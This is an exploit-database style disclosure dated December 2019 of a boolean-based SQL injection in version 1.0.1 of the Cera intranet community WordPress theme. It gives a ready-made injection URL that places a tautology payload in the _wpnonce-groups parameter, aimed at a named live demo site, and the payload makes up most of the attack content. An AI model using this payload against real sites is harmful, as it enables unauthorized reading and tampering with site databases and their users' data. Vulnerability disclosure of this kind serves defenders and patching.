Share
===========================================================================================  
# Exploit Title: cera-intranet-community-theme SQL Inj.  
# Dork: N/A  
# Date: 29-12-2019  
# Exploit Author: Mehmet EMIROGLU  
# Vendor Homepage:  
https://themeforest.net/item/cera-intranet-community-theme/24872621  
# Software Link:  
https://themeforest.net/item/cera-intranet-community-theme/24872621  
# Version: v1.0.1  
# Category: Webapps  
# Tested on: Wamp64, Windows  
# CVE: N/A  
# Software Description: N/A  
===========================================================================================  
# POC - SQLi (Boolean Based)  
# Parameters : _wpnonce-groups  
# Attack Pattern :  
https://intranet-dark.cera-theme.com/?_wp_http_referer=/home/&groups_widget_max=8&_wpnonce-groups=45a424e69f%27/**/aNd/**/5468967=5468967/**/aNd/**/%276199%27=%276199  
# GET Method :  
https://intranet-dark.cera-theme.com/?_wp_http_referer=/home/&groups_widget_max=8&_wpnonce-groups=45a424e69f  
===========================================================================================